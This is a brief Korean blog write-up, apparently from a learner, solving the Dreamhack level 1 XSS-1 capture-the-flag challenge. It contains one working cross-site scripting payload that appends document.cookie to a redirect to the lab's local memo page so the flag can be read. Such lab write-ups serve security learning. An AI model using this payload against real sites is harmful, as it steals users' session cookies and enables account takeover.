본문 바로가기
정보 보호 관리

Dreamhack level1 Xss-1 문제 해결

애라니라니 2023. 3. 30. 10:56

- 2023.03.30

Dreamhack level1 Xss-1
1. 문제 확인

 

  • URL 접속으로 XSS 취약점을 확인해 플래그 획득해야 함

 

2. 소스 코드 확인

 

  • 소스코드 속 URL로 접속을 해야 하지만 접속 불가능함
  • 우회를 통해 XSS 취약점을 공격

 

 

3. XSS 취약점

 

  • 스크립트 코드 실행해 XSS 취약점을 공약
  • <script>location.href="http://127.0.0.1:8000/memo?memo=hello"+document.cookie;</script>

4. 문제 해결

 

  • 스크립트가 실행되어 메모 페이지에 들어가면 flag 확인 가능

 

'정보 보호 관리' 카테고리의 다른 글

CSRF 개념과 Dreamhack CSRF-1 문제 해결  (0) 2023.04.06
Dreamhack level1 Xss-2 문제 해결  (0) 2023.03.30
webhacking.kr old-23 문제 해결  (0) 2023.03.23
XSS 공격 : 모의 해킹 해보기  (0) 2023.03.23
Dreamhack level1 coockie 문제 해결  (0) 2023.03.23

'정보 보호 관리' Related Articles

티스토리툴바